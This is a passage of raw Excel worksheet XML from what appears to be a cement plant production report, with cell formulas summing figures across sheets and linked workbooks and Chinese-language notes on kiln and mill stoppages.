        <f>J47+'6'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]7'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]7'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]7'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'6'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]7'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'6'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]7'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'6'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'6'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]7'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]7'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]7'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'6'!U48</f>
        <v>300.06</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6326.59</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]7'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'6'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]7'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'6'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'6'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]7'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]7'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]7'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'6'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]7'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'6'!X49</f>
        <v>0</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]7'!$Y$8</f>
        <v>10593.625</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'6'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'6'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]7'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]7'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]7'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'6'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]7'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'6'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]7'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]7'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]7'!$E$24</f>
        <v>4741</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'6'!H51</f>
        <v>41009.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1417408.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]7'!$I$24</f>
        <v>4811.609</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'6'!K51</f>
        <v>37008.426</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1400132.357</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]7'!$L$24</f>
        <v>52700.2579999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>117.111684444444</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]7'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]7'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]7'!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'6'!U51</f>
        <v>1659.78</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>64658.251</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]7'!$V$30</f>
        <v>199.2</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'6'!X51</f>
        <v>1738.588</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>62354.825</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]7'!$Y$30</f>
        <v>3172.56600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]7'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]7'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'6'!H52</f>
        <v>1.4e-10</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]7'!$I$19</f>
        <v>6117.06</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'6'!K52</f>
        <v>40039.928</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1321734.128</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]7'!$L$19</f>
        <v>65006.5150000503</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>44.8320793103795</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'[13]7'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]7'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'6'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]7'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'6'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]7'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]7'!$M$21+'[14]7'!$M$22+'[14]7'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]7'!$N$21+'[14]7'!$N$22+'[14]7'!$N$35</f>
        <v>0</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'6'!U53</f>
        <v>263.56</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38597.987</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]7'!$Q$21+'[14]7'!$Q$22+'[14]7'!$Q$35</f>
        <v>27</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'6'!X53</f>
        <v>355</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>39846</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]7'!$T$21+'[14]7'!$T$22+'[14]7'!$T$35</f>
        <v>1557.507</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]7'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'6'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]7'!$I$47</f>
        <v>2325.06</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'6'!K54</f>
        <v>7812.232</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>219254.082</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]7'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]7'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]7'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]7'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'6'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]7'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'6'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]7'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]7'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'6'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]7'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'6'!K55</f>
        <v>1228.316</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>36663.966</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]7'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]7'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]7'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]7'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]7'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]7'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]7'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]7'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]7'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'6'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'6'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]7'!$Q$62</f>
        <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:40避峰停机；2#磨：8:30-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：7:00-24:00库满停机。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G57+'6'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'6'!K57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G58+'6'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'6'!K58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G59+'6'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'6'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]7'!$Q$65</f>
        <v>窑:正常。A组磨：8:20-24:00避峰停机。D1#磨：8:30-24:00避峰停机，D2#磨：8:30-24:00避峰停机。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G60+'6'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'6'!K60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'[14]7'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]7'!$E$6</f>
        <v>4090</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'6'!H61</f>
        <v>24905</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1140778</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]7'!$E$21</f>
        <v>3998.86</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'6'!K61</f>
        <v>26225.37</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1127385.45</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]7'!$H$6</f>
        <v>36448.7999999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>70.093846153846</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'[14]7'!$M$11+'[14]7'!$M$12+'[14]7'!$M$13+'[14]7'!$M$14+'[14]7'!$M$15+'[14]7'!$M$16+'[14]7'!$M$17+'[14]7'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]7'!$N$11+'[14]7'!$N$12+'[14]7'!$N$13+'[14]7'!$N$14+'[14]7'!$N$15+'[14]7'!$N$16+'[14]7'!$N$17+'[14]7'!$N$18</f>
        <v>1206</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'6'!H62</f>
        <v>14740</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>850733.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]7'!$Q$11+'[14]7'!$Q$12+'[14]7'!$Q$13+'[14]7'!$Q$14+'[14]7'!$Q$15+'[14]7'!$Q$16+'[14]7'!$Q$17+'[14]7'!$Q$18</f>
        <v>2629</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'6'!K62</f>
        <v>17720</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>852192.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]7'!$T$11+'[14]7'!$T$12+'[14]7'!$T$13+'[14]7'!$T$14+'[14]7'!$T$15+'[14]7'!$T$16+'[14]7'!$T$17+'[14]7'!$T$18</f>
        <v>15474.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>61.8985359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]7'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]7'!$M$19+'[14]7'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]7'!$N$19+'[14]7'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'6'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]7'!$Q$19+'[14]7'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'6'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]7'!$T$19+'[14]7'!$T$20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G64+'6'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'6'!K64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G65+'6'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'6'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]7'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:7:00-24:00库满停机。2#磨:正常。3#磨:8:00-24:00避峰停机。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G66+'6'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'6'!K66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G67+'6'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'6'!K67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'[15]7'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]7'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'6'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]7'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'6'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]7'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]7'!$Q$77</f>
        <v>1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨10:00-22:15避峰停机:12.25小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]7'!$D$43+'[15]7'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]7'!$E$43+'[15]7'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'6'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]7'!$H$43+'[15]7'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'6'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]7'!$K$43+'[15]7'!$K$44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'[15]7'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]7'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'6'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]7'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'6'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]7'!$K$45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G71+'6'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'6'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]7'!$Q$80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G72+'6'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'6'!K72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G73+'6'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'6'!K73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G74+'6'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'6'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]7'!$Q$83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G75+'6'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'6'!K75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G76+'6'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'6'!K76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G77+'6'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'6'!K77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G78+'6'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'6'!K78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'[16]7'!$E$7</f>
        <v>565.46</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'6'!H79</f>
        <v>3684.52</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>150812.99</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]7'!$I$7</f>
        <v>739</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'6'!K79</f>
        <v>3808.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>145699.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]7'!$L$7</f>
        <v>4760.8</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.5216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'[16]7'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'6'!H80</f>
        <v>0</v>
      </c>
